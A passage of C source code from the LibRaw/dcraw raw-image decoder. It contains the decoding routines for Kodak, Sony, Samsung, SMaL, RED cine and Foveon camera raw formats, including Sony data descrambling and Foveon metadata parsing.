if (pi1 < 0 && col > 1) pi1 = pi2 = pi-2;
pred = (pi1 < 0) ? 0 : (pixel[pi1] + pixel[pi2]) >> 1;
pixel[pi] = val = pred + ljpeg_diff (huff[chess]);
if (val >> 8) derror();
val = curve[pixel[pi++]];
RAW(row,col) = val;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
FORC(2) free (huff[c]);
}
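/*
Kodak 65000 decoder shared by kodak_65000_load_raw, kodak_ycbcr_load_raw
and kodak_rgb_load_raw: reads a block of bit lengths, then the
variable-length differences themselves.  If any length exceeds 12 bits
the block is re-read as packed 12-bit absolute values and the function
returns 1 (no predictor).
*/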
int CLASS kodak_65000_decode (short *out, int bsize)
{
uchar c, blen[768];
ushort raw[6];
INT64 bitbuf=0;
int save, bits=0, i, j, len, diff;
save = ftell(ifp);
bsize = (bsize + 3) & -4;
for (i=0; i < bsize; i+=2) {
c = fgetc(ifp);
if ((blen[i ] = c & 15) > 12 ||
(blen[i+1] = c >> 4) > 12 ) {
fseek (ifp, save, SEEK_SET);
for (i=0; i < bsize; i+=8) {
read_shorts (raw, 6);
out[i ] = raw[0] >> 12 << 8 | raw[2] >> 12 << 4 | raw[4] >> 12;
out[i+1] = raw[1] >> 12 << 8 | raw[3] >> 12 << 4 | raw[5] >> 12;
for (j=0; j < 6; j++)
out[i+2+j] = raw[j] & 0xfff;
}
return 1;
}
}
if ((bsize & 7) == 4) {
bitbuf = fgetc(ifp) << 8;
bitbuf += fgetc(ifp);
bits = 16;
}
for (i=0; i < bsize; i++) {
len = blen[i];
if (bits < len) {
for (j=0; j < 32; j+=8)
bitbuf += (INT64) fgetc(ifp) << (bits+(j^8));
bits += 32;
}
diff = bitbuf & (0xffff >> (16-len));
bitbuf >>= len;
bits -= len;
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - 1;
out[i] = diff;
}
return 0;
}
void CLASS kodak_65000_load_raw()
{
short buf[272]; /* extra room for data stored w/o predictor */
int row, col, len, pred[2], ret, i;
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col+=256) {
pred[0] = pred[1] = 0;
len = MIN (256, width-col);
ret = kodak_65000_decode (buf, len);
for (i=0; i < len; i++)
{
int idx = ret ? buf[i] : (pred[i & 1] += buf[i]);
if(idx >=0 && idx <= 0xffff)
{
if ((RAW(row,col+i) = curve[idx]) >> 12) derror();
}
else
derror();
}
}
}
}
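/*
   kodak_ycbcr_load_raw(): decodes kodak_65000 blocks of YCbCr data two
   rows at a time.  Cb/Cr are accumulated per 2x2 cell, the four luma
   deltas are chained, and each pixel is converted to RGB through curve[].
 */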
void CLASS kodak_ycbcr_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
short buf[384], *bp;
int row, col, len, c, i, j, k, y[2][2], cb, cr, rgb[3];
ushort *ip;
if (!image) return;
unsigned int bits = (load_flags && load_flags > 9 && load_flags < 17)?load_flags:10;
for (row=0; row < height; row+=2)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col+=128) {
len = MIN (128, width-col);
kodak_65000_decode (buf, len*3);
y[0][1] = y[1][1] = cb = cr = 0;
for (bp=buf, i=0; i < len; i+=2, bp+=2) {
cb += bp[4];
cr += bp[5];
rgb[1] = -((cb + cr + 2) >> 2);
rgb[2] = rgb[1] + cb;
rgb[0] = rgb[1] + cr;
for (j=0; j < 2; j++)
for (k=0; k < 2; k++) {
if ((y[j][k] = y[j][k^1] + *bp++) >> bits) derror();
ip = image[(row+j)*width + col+i+k];
FORC3 ip[c] = curve[LIM(y[j][k]+rgb[c], 0, 0xfff)];
}
}
}
}
}
void CLASS kodak_rgb_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
short buf[768], *bp;
int row, col, len, c, i, rgb[3],ret;
ushort *ip=image[0];
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col+=256) {
len = MIN (256, width-col);
ret = kodak_65000_decode (buf, len*3);
memset (rgb, 0, sizeof rgb);
for (bp=buf, i=0; i < len; i++, ip+=4)
#ifdef LIBRAW_LIBRARY_BUILD
if(load_flags == 12)
{
FORC3 ip[c] = ret ? (*bp++) : (rgb[c] += *bp++);
}
else
#endif
FORC3 if ((ip[c] = ret ? (*bp++) : (rgb[c] += *bp++)) >> 12) derror();
}
}
}
void CLASS kodak_thumb_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
int row, col;
colors = thumb_misc >> 5;
for (row=0; row < height; row++)
for (col=0; col < width; col++)
read_shorts (image[row*width+col], colors);
maximum = (1 << (thumb_misc & 31)) - 1;
}
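/*
   Sony "decryption": when start is nonzero, a 128-word pad is seeded from
   the key with a linear-congruential generator; the data words are then
   XORed with a rolling combination of pad entries.  The pad persists
   between calls (kept per-thread unless LIBRAW_NOTHREADS is defined).
 */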
void CLASS sony_decrypt (unsigned *data, int len, int start, int key)
{
#ifndef LIBRAW_NOTHREADS
#define pad tls->sony_decrypt.pad
#define p tls->sony_decrypt.p
#else
static unsigned pad[128], p;
#endif
if (start) {
for (p=0; p < 4; p++)
pad[p] = key = key * 48828125 + 1;
pad[3] = pad[3] << 1 | (pad[0]^pad[2]) >> 31;
for (p=4; p < 127; p++)
pad[p] = (pad[p-4]^pad[p-2]) << 1 | (pad[p-3]^pad[p-1]) >> 31;
for (p=0; p < 127; p++)
pad[p] = htonl(pad[p]);
}
while (len--)
{
*data++ ^= pad[p & 127] = pad[(p+1) & 127] ^ pad[(p+65) & 127];
p++;
}
#ifndef LIBRAW_NOTHREADS
#undef pad
#undef p
#endif
}
void CLASS sony_load_raw()
{
uchar head[40];
ushort *pixel;
unsigned i, key, row, col;
fseek (ifp, 200896, SEEK_SET);
fseek (ifp, (unsigned) fgetc(ifp)*4 - 1, SEEK_CUR);
order = 0x4d4d;
key = get4();
fseek (ifp, 164600, SEEK_SET);
fread (head, 1, 40, ifp);
sony_decrypt ((unsigned *) head, 10, 1, key);
for (i=26; i-- > 22; )
key = key << 8 | head[i];
fseek (ifp, data_offset, SEEK_SET);
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
pixel = raw_image + row*raw_width;
if (fread (pixel, 2, raw_width, ifp) < raw_width) derror();
sony_decrypt ((unsigned *) pixel, raw_width/2, !row, key);
for (col=0; col < raw_width; col++)
if ((pixel[col] = ntohs(pixel[col])) >> 14) derror();
}
maximum = 0x3ff0;
}
void CLASS sony_arw_load_raw()
{
ushort huff[32770];
static const ushort tab[18] =
{ 0xf11,0xf10,0xe0f,0xd0e,0xc0d,0xb0c,0xa0b,0x90a,0x809,
0x708,0x607,0x506,0x405,0x304,0x303,0x300,0x202,0x201 };
int i, c, n, col, row, sum=0;
huff[0] = 15;
for (n=i=0; i < 18; i++)
FORC(32768 >> (tab[i] >> 8)) huff[++n] = tab[i];
getbits(-1);
for (col = raw_width; col--; )
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (row=0; row < raw_height+1; row+=2) {
if (row == raw_height) row = 1;
if ((sum += ljpeg_diff(huff)) >> 12) derror();
if (row < height) RAW(row,col) = sum;
}
}
}
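/*
   Sony ARW2: each 16-byte packet describes 16 pixels as an 11-bit max,
   an 11-bit min, their 4-bit positions, and fourteen 7-bit deltas that
   are shifted by sh and added to min.  The LibRaw-only
   raw_processing_options flags select alternative unpacking modes
   (base only, delta only, delta-to-value, etc.).
 */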
void CLASS sony_arw2_load_raw()
{
uchar *data, *dp;
ushort pix[16];
int row, col, val, max, min, imax, imin, sh, bit, i;
data = (uchar *) malloc (raw_width+1);
merror (data, "sony_arw2_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fread (data, 1, raw_width, ifp);
for (dp=data, col=0; col < raw_width-30; dp+=16) {
max = 0x7ff & (val = sget4(dp));
min = 0x7ff & val >> 11;
imax = 0x0f & val >> 22;
imin = 0x0f & val >> 26;
for (sh=0; sh < 4 && 0x80 << sh <= max-min; sh++);
#ifdef LIBRAW_LIBRARY_BUILD
      /* flag checks are done here, outside of the inner pixel loop */
if(! (imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_ALLFLAGS) // no flag set
|| (imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTATOVALUE)
)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = max;
else if (i == imin) pix[i] = min;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh) + min;
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_BASEONLY)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = max;
else if (i == imin) pix[i] = min;
else pix[i]=0;
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTAONLY)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = 0;
else if (i == imin) pix[i] = 0;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh) + min;
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTAZEROBASE)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = 0;
else if (i == imin) pix[i] = 0;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh);
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
}
#else
/* unaltered dcraw processing */
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = max;
else if (i == imin) pix[i] = min;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh) + min;
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTATOVALUE)
{
for (i=0; i < 16; i++, col+=2)
{
unsigned slope = pix[i] < 1001? 2 : curve[pix[i]<<1]-curve[(pix[i]<<1)-2];
unsigned step = 1 << sh;
RAW(row,col)=curve[pix[i]<<1]>black+imgdata.params.sony_arw2_posterization_thr?
LIM(((slope*step*1000)/(curve[pix[i]<<1]-black)),0,10000):0;
}
}
else
{
for (i=0; i < 16; i++, col+=2)
RAW(row,col) = curve[pix[i] << 1];
}
#else
for (i=0; i < 16; i++, col+=2)
RAW(row,col) = curve[pix[i] << 1] >> 2;
#endif
col -= col & 1 ? 1:31;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (data);
throw;
}
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTATOVALUE)
maximum=10000;
#endif
free (data);
}
void CLASS samsung_load_raw()
{
int row, col, c, i, dir, op[4], len[4];
#ifdef LIBRAW_LIBRARY_BUILD
if(raw_width> 32768 || raw_height > 32768) // definitely too much for old samsung
throw LIBRAW_EXCEPTION_IO_BADFILE;
#endif
unsigned maxpixels = raw_width*(raw_height+7);
order = 0x4949;
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, strip_offset+row*4, SEEK_SET);
fseek (ifp, data_offset+get4(), SEEK_SET);
ph1_bits(-1);
FORC4 len[c] = row < 2 ? 7:4;
for (col=0; col < raw_width; col+=16) {
dir = ph1_bits(1);
FORC4 op[c] = ph1_bits(2);
FORC4 switch (op[c]) {
case 3: len[c] = ph1_bits(4); break;
case 2: len[c]--; break;
case 1: len[c]++;
}
for (c = 0; c < 16; c += 2)
{
i = len[((c & 1) << 1) | (c >> 3)];
unsigned idest = RAWINDEX(row, col + c);
unsigned isrc = (dir ? RAWINDEX(row + (~c | -2), col + c) : col ? RAWINDEX(row, col + (c | -2)) : 0);
if(idest < maxpixels && isrc < maxpixels) // less than zero is handled by unsigned conversion
RAW(row, col + c) = ((signed)ph1_bits(i) << (32 - i) >> (32 - i)) + (dir ? RAW(row + (~c | -2), col + c) : col ? RAW(row, col + (c | -2)) : 128);
else
derror();
if (c == 14)
c = -1;
}
}
}
for (row=0; row < raw_height-1; row+=2)
for (col=0; col < raw_width-1; col+=2)
SWAP (RAW(row,col+1), RAW(row+1,col));
}
void CLASS samsung2_load_raw()
{
static const ushort tab[14] =
{ 0x304,0x307,0x206,0x205,0x403,0x600,0x709,
0x80a,0x90b,0xa0c,0xa0d,0x501,0x408,0x402 };
ushort huff[1026], vpred[2][2] = {{0,0},{0,0}}, hpred[2];
int i, c, n, row, col, diff;
huff[0] = 10;
for (n=i=0; i < 14; i++)
FORC(1024 >> (tab[i] >> 8)) huff[++n] = tab[i];
getbits(-1);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
diff = ljpeg_diff (huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
RAW(row,col) = hpred[col & 1];
if (hpred[col & 1] >> tiff_bps) derror();
}
}
}
void CLASS samsung3_load_raw()
{
int opt, init, mag, pmode, row, tab, col, pred, diff, i, c;
ushort lent[3][2], len[4], *prow[2];
order = 0x4949;
fseek (ifp, 9, SEEK_CUR);
opt = fgetc(ifp);
init = (get2(),get2());
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, (data_offset-ftell(ifp)) & 15, SEEK_CUR);
ph1_bits(-1);
mag = 0; pmode = 7;
FORC(6) ((ushort *)lent)[c] = row < 2 ? 7:4;
prow[ row & 1] = &RAW(row-1,1-((row & 1) << 1)); // green
prow[~row & 1] = &RAW(row-2,0); // red and blue
for (tab=0; tab+15 < raw_width; tab+=16) {
if (~opt & 4 && !(tab & 63)) {
i = ph1_bits(2);
mag = i < 3 ? mag-'2'+"204"[i] : ph1_bits(12);
}
if (opt & 2)
pmode = 7 - 4*ph1_bits(1);
else if (!ph1_bits(1))
pmode = ph1_bits(3);
if (opt & 1 || !ph1_bits(1)) {
FORC4 len[c] = ph1_bits(2);
FORC4 {
i = ((row & 1) << 1 | (c & 1)) % 3;
len[c] = len[c] < 3 ? lent[i][0]-'1'+"120"[len[c]] : ph1_bits(4);
lent[i][0] = lent[i][1];
lent[i][1] = len[c];
}
}
FORC(16) {
col = tab + (((c & 7) << 1)^(c >> 3)^(row & 1));
pred = (pmode == 7 || row < 2)
? (tab ? RAW(row,tab-2+(col & 1)) : init)
: (prow[col & 1][col-'4'+"0224468"[pmode]] +
prow[col & 1][col-'4'+"0244668"[pmode]] + 1) >> 1;
diff = ph1_bits (i = len[c >> 2]);
if (diff >> (i-1)) diff -= 1 << i;
diff = diff * (mag*2+1) + mag;
RAW(row,col) = pred + diff;
}
}
}
}
#define HOLE(row) ((holes >> (((row) - raw_height) & 7)) & 1)
/* Kudos to Rich Taylor for figuring out SMaL's compression algorithm. */
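/*
   smal_decode_segment(): three symbols per pixel are pulled from the bit
   stream using the adaptive hist[] tables, combined into a signed
   difference and accumulated into raw_image[].  HOLE() rows are skipped
   here and reconstructed later by fill_holes().
 */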
void CLASS smal_decode_segment (unsigned seg[2][2], int holes)
{
uchar hist[3][13] = {
{ 7, 7, 0, 0, 63, 55, 47, 39, 31, 23, 15, 7, 0 },
{ 7, 7, 0, 0, 63, 55, 47, 39, 31, 23, 15, 7, 0 },
{ 3, 3, 0, 0, 63, 47, 31, 15, 0 } };
int low, high=0xff, carry=0, nbits=8;
int pix, s, count, bin, next, i, sym[3];
uchar diff, pred[]={0,0};
ushort data=0, range=0;
fseek (ifp, seg[0][1]+1, SEEK_SET);
getbits(-1);
if (seg[1][0] > raw_width*raw_height)
seg[1][0] = raw_width*raw_height;
for (pix=seg[0][0]; pix < seg[1][0]; pix++) {
for (s=0; s < 3; s++) {
data = data << nbits | getbits(nbits);
if (carry < 0)
carry = (nbits += carry+1) < 1 ? nbits-1 : 0;
while (--nbits >= 0)
if ((data >> nbits & 0xff) == 0xff) break;
if (nbits > 0)
data = ((data & ((1 << (nbits-1)) - 1)) << 1) |
((data + (((data & (1 << (nbits-1)))) << 1)) & ((~0u) << nbits));
if (nbits >= 0) {
data += getbits(1);
carry = nbits - 8;
}
count = ((((data-range+1) & 0xffff) << 2) - 1) / (high >> 4);
for (bin=0; hist[s][bin+5] > count; bin++);
low = hist[s][bin+5] * (high >> 4) >> 2;
if (bin) high = hist[s][bin+4] * (high >> 4) >> 2;
high -= low;
for (nbits=0; high << nbits < 128; nbits++);
range = (range+low) << nbits;
high <<= nbits;
next = hist[s][1];
if (++hist[s][2] > hist[s][3]) {
next = (next+1) & hist[s][0];
hist[s][3] = (hist[s][next+4] - hist[s][next+5]) >> 2;
hist[s][2] = 1;
}
if (hist[s][hist[s][1]+4] - hist[s][hist[s][1]+5] > 1) {
if (bin < hist[s][1])
for (i=bin; i < hist[s][1]; i++) hist[s][i+5]--;
else if (next <= bin)
for (i=hist[s][1]; i < bin; i++) hist[s][i+5]++;
}
hist[s][1] = next;
sym[s] = bin;
}
diff = sym[2] << 5 | sym[1] << 2 | (sym[0] & 3);
if (sym[0] & 4)
diff = diff ? -diff : 0x80;
if (ftell(ifp) + 12 >= seg[1][1])
diff = 0;
#ifdef LIBRAW_LIBRARY_BUILD
if(pix>=raw_width*raw_height)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
raw_image[pix] = pred[pix & 1] += diff;
if (!(pix & 1) && HOLE(pix / raw_width)) pix += 2;
}
maximum = 0xff;
}
void CLASS smal_v6_load_raw()
{
unsigned seg[2][2];
fseek (ifp, 16, SEEK_SET);
seg[0][0] = 0;
seg[0][1] = get2();
seg[1][0] = raw_width * raw_height;
seg[1][1] = INT_MAX;
smal_decode_segment (seg, 0);
}
int CLASS median4 (int *p)
{
int min, max, sum, i;
min = max = sum = p[0];
for (i=1; i < 4; i++) {
sum += p[i];
if (min > p[i]) min = p[i];
if (max < p[i]) max = p[i];
}
return (sum - min - max) >> 1;
}
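/*
   fill_holes(): rows skipped by smal_decode_segment() are reconstructed;
   every other sample is filled from its four diagonal neighbours and the
   rest from horizontal/vertical neighbours, taking median4() of the four
   values where possible.
 */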
void CLASS fill_holes (int holes)
{
int row, col, val[4];
for (row=2; row < height-2; row++) {
if (!HOLE(row)) continue;
for (col=1; col < width-1; col+=4) {
val[0] = RAW(row-1,col-1);
val[1] = RAW(row-1,col+1);
val[2] = RAW(row+1,col-1);
val[3] = RAW(row+1,col+1);
RAW(row,col) = median4(val);
}
for (col=2; col < width-2; col+=4)
if (HOLE(row-2) || HOLE(row+2))
RAW(row,col) = (RAW(row,col-2) + RAW(row,col+2)) >> 1;
else {
val[0] = RAW(row,col-2);
val[1] = RAW(row,col+2);
val[2] = RAW(row-2,col);
val[3] = RAW(row+2,col);
RAW(row,col) = median4(val);
}
}
}
void CLASS smal_v9_load_raw()
{
unsigned seg[256][2], offset, nseg, holes, i;
fseek (ifp, 67, SEEK_SET);
offset = get4();
nseg = (uchar) fgetc(ifp);
fseek (ifp, offset, SEEK_SET);
for (i=0; i < nseg*2; i++)
((unsigned *)seg)[i] = get4() + data_offset*(i & 1);
fseek (ifp, 78, SEEK_SET);
holes = fgetc(ifp);
fseek (ifp, 88, SEEK_SET);
seg[nseg][0] = raw_height * raw_width;
seg[nseg][1] = get4() + data_offset;
for (i=0; i < nseg; i++)
smal_decode_segment (seg+i, holes);
if (holes) fill_holes (holes);
}
void CLASS redcine_load_raw()
{
#ifndef NO_JASPER
int c, row, col;
jas_stream_t *in;
jas_image_t *jimg;
jas_matrix_t *jmat;
jas_seqent_t *data;
ushort *img, *pix;
jas_init();
#ifndef LIBRAW_LIBRARY_BUILD
in = jas_stream_fopen (ifname, "rb");
#else
in = (jas_stream_t*)ifp->make_jas_stream();
if(!in)
throw LIBRAW_EXCEPTION_DECODE_JPEG2000;
#endif
jas_stream_seek (in, data_offset+20, SEEK_SET);
jimg = jas_image_decode (in, -1, 0);
#ifndef LIBRAW_LIBRARY_BUILD
if (!jimg) longjmp (failure, 3);
#else
if(!jimg)
{
jas_stream_close (in);
throw LIBRAW_EXCEPTION_DECODE_JPEG2000;
}
#endif
jmat = jas_matrix_create (height/2, width/2);
merror (jmat, "redcine_load_raw()");
img = (ushort *) calloc ((height+2), (width+2)*2);
merror (img, "redcine_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
bool fastexitflag = false;
try {
#endif
FORC4 {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
jas_image_readcmpt (jimg, c, 0, 0, width/2, height/2, jmat);
data = jas_matrix_getref (jmat, 0, 0);
for (row = c >> 1; row < height; row+=2)
for (col = c & 1; col < width; col+=2)
img[(row+1)*(width+2)+col+1] = data[(row/2)*(width/2)+col/2];
}
for (col=1; col <= width; col++) {
img[col] = img[2*(width+2)+col];
img[(height+1)*(width+2)+col] = img[(height-1)*(width+2)+col];
}
for (row=0; row < height+2; row++) {
img[row*(width+2)] = img[row*(width+2)+2];
img[(row+1)*(width+2)-1] = img[(row+1)*(width+2)-3];
}
for (row=1; row <= height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
pix = img + row*(width+2) + (col = 1 + (FC(row,1) & 1));
for ( ; col <= width; col+=2, pix+=2) {
c = (((pix[0] - 0x800) << 3) +
pix[-(width+2)] + pix[width+2] + pix[-1] + pix[1]) >> 2;
pix[0] = LIM(c,0,4095);
}
}
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++)
RAW(row,col) = curve[img[(row+1)*(width+2)+col+1]];
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
fastexitflag=true;
}
#endif
free (img);
jas_matrix_destroy (jmat);
jas_image_destroy (jimg);
jas_stream_close (in);
#ifdef LIBRAW_LIBRARY_BUILD
if(fastexitflag)
throw LIBRAW_EXCEPTION_CANCELLED_BY_CALLBACK;
#endif
#endif
}
//@end COMMON
/* RESTRICTED code starts here */
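/*
   foveon_decoder(): recursively builds a binary decoding tree in
   first_decode[] from the table of up-to-26-bit codes read on the
   initial (code == 0) call.
 */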
void CLASS foveon_decoder (unsigned size, unsigned code)
{
static unsigned huff[1024];
struct decode *cur;
int i, len;
if (!code) {
for (i=0; i < size; i++)
huff[i] = get4();
memset (first_decode, 0, sizeof first_decode);
free_decode = first_decode;
}
cur = free_decode++;
if (free_decode > first_decode+2048) {
fprintf (stderr,_("%s: decoder table overflow\n"), ifname);
longjmp (failure, 2);
}
if (code)
for (i=0; i < size; i++)
if (huff[i] == code) {
cur->leaf = i;
return;
}
if ((len = code >> 27) > 26) return;
code = (len+1) << 27 | (code & 0x3ffffff) << 1;
cur->branch[0] = free_decode;
foveon_decoder (size, code);
cur->branch[1] = free_decode;
foveon_decoder (size, code+1);
}
void CLASS foveon_thumb()
{
unsigned bwide, row, col, bitbuf=0, bit=1, c, i;
char *buf;
struct decode *dindex;
short pred[3];
bwide = get4();
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
if (bwide > 0) {
if (bwide < thumb_width*3) return;
buf = (char *) malloc (bwide);
merror (buf, "foveon_thumb()");
for (row=0; row < thumb_height; row++) {
fread (buf, 1, bwide, ifp);
fwrite (buf, 3, thumb_width, ofp);
}
free (buf);
return;
}
foveon_decoder (256, 0);
for (row=0; row < thumb_height; row++) {
memset (pred, 0, sizeof pred);
if (!bit) get4();
for (bit=col=0; col < thumb_width; col++)
FORC3 {
for (dindex=first_decode; dindex->branch[0]; ) {
if ((bit = (bit-1) & 31) == 31)
for (i=0; i < 4; i++)
bitbuf = (bitbuf << 8) + fgetc(ifp);
dindex = dindex->branch[bitbuf >> bit & 1];
}
pred[c] += dindex->leaf;
fputc (pred[c], ofp);
}
}
}
void CLASS foveon_sd_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
struct decode *dindex;
short diff[1024];
unsigned bitbuf=0;
int pred[3], row, col, bit=-1, c, i;
read_shorts ((ushort *) diff, 1024);
if (!load_flags) foveon_decoder (1024, 0);
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
memset (pred, 0, sizeof pred);
if (!bit && !load_flags && atoi(model+2) < 14) get4();
for (col=bit=0; col < width; col++) {
if (load_flags) {
bitbuf = get4();
FORC3 pred[2-c] += diff[bitbuf >> c*10 & 0x3ff];
}
else FORC3 {
for (dindex=first_decode; dindex->branch[0]; ) {
if ((bit = (bit-1) & 31) == 31)
for (i=0; i < 4; i++)
bitbuf = (bitbuf << 8) + fgetc(ifp);
dindex = dindex->branch[bitbuf >> bit & 1];
}
pred[c] += diff[dindex->leaf];
if (pred[c] >> 16 && ~pred[c] >> 16) derror();
}
FORC3 image[row*width+col][c] = pred[c];
}
}
}
void CLASS foveon_huff (ushort *huff)
{
int i, j, clen, code;
huff[0] = 8;
for (i=0; i < 13; i++) {
clen = getc(ifp);
code = getc(ifp);
for (j=0; j < 256 >> clen; )
huff[code+ ++j] = clen << 8 | i;
}
get2();
}
void CLASS foveon_dp_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
unsigned c, roff[4], row, col, diff;
ushort huff[512], vpred[2][2], hpred[2];
fseek (ifp, 8, SEEK_CUR);
foveon_huff (huff);
roff[0] = 48;
FORC3 roff[c+1] = -(-(roff[c] + get4()) & -16);
FORC3 {
fseek (ifp, data_offset+roff[c], SEEK_SET);
getbits(-1);
vpred[0][0] = vpred[0][1] = vpred[1][0] = vpred[1][1] = 512;
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++) {
diff = ljpeg_diff(huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
image[row*width+col][c] = hpred[col & 1];
}
}
}
}
void CLASS foveon_load_camf()
{
unsigned type, wide, high, i, j, row, col, diff;
ushort huff[258], vpred[2][2] = {{512,512},{512,512}}, hpred[2];
fseek (ifp, meta_offset, SEEK_SET);
type = get4(); get4(); get4();
wide = get4();
high = get4();
if (type == 2) {
fread (meta_data, 1, meta_length, ifp);
for (i=0; i < meta_length; i++) {
high = (high * 1597 + 51749) % 244944;
wide = high * (INT64) 301593171 >> 24;
meta_data[i] ^= ((((high << 8) - wide) >> 1) + wide) >> 17;
}
} else if (type == 4) {
free (meta_data);
meta_data = (char *) malloc (meta_length = wide*high*3/2);
merror (meta_data, "foveon_load_camf()");
foveon_huff (huff);
get4();
getbits(-1);
for (j=row=0; row < high; row++) {
for (col=0; col < wide; col++) {
diff = ljpeg_diff(huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
if (col & 1) {
meta_data[j++] = hpred[0] >> 4;
meta_data[j++] = hpred[0] << 4 | hpred[1] >> 8;
meta_data[j++] = hpred[1];
}
}
}
}
#ifdef DCRAW_VERBOSE
else
fprintf (stderr,_("%s has unknown CAMF type %d.\n"), ifname, type);
#endif
}
const char * CLASS foveon_camf_param (const char *block, const char *param)
{
unsigned idx, num;
char *pos, *cp, *dp;
for (idx=0; idx < meta_length; idx += sget4(pos+8)) {
pos = meta_data + idx;
if (strncmp (pos, "CMb", 3)) break;
if (pos[3] != 'P') continue;
if (strcmp (block, pos+sget4(pos+12))) continue;
cp = pos + sget4(pos+16);
num = sget4(cp);
dp = pos + sget4(cp+4);
while (num--) {
cp += 8;
if (!strcmp (param, dp+sget4(cp)))
return dp+sget4(cp+4);
}
}
return 0;
}
void * CLASS foveon_camf_matrix (unsigned dim[3], const char *name)
{
unsigned i, idx, type, ndim, size, *mat;
char *pos, *cp, *dp;
double dsize;
for (idx=0; idx < meta_length; idx += sget4(pos+8)) {
pos = meta_data + idx;
if (strncmp (pos, "CMb", 3)) break;
if (pos[3] != 'M') continue;
if (strcmp (name, pos+sget4(pos+12))) continue;
dim[0] = dim[1] = dim[2] = 1;
cp = pos + sget4(pos+16);
type = sget4(cp);
if ((ndim = sget4(cp+4)) > 3) break;
dp = pos + sget4(cp+8);
for (i=ndim; i--; ) {
cp += 12;
dim[i] = sget4(cp);
}
if ((dsize = (double) dim[0]*dim[1]*dim[2]) > meta_length/4) break;
mat = (unsigned *) malloc ((size = dsize) * 4);
merror (mat, "foveon_camf_matrix()");
for (i=0; i < size; i++)
if (type && type != 6)
mat[i] = sget4(dp + i*4);
else
mat[i] = sget4(dp + i*2) & 0xffff;
return mat;
}
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: \"%s\" matrix not found!\n"), ifname, name);
#endif
return 0;
}
int CLASS foveon_fixed (void *ptr, int size, const char *name)
{
void *dp;
unsigned dim[3];
if (!name) return 0;
dp = foveon_camf_matrix (dim, name);
if (!dp) return 0;
memcpy (ptr, dp, size*4);
free (dp);
return 1;
}
float CLASS foveon_avg (short *pix, int range[2], float cfilt)
{
int i;
float val, min=FLT_MAX, max=-FLT_MAX, sum=0;
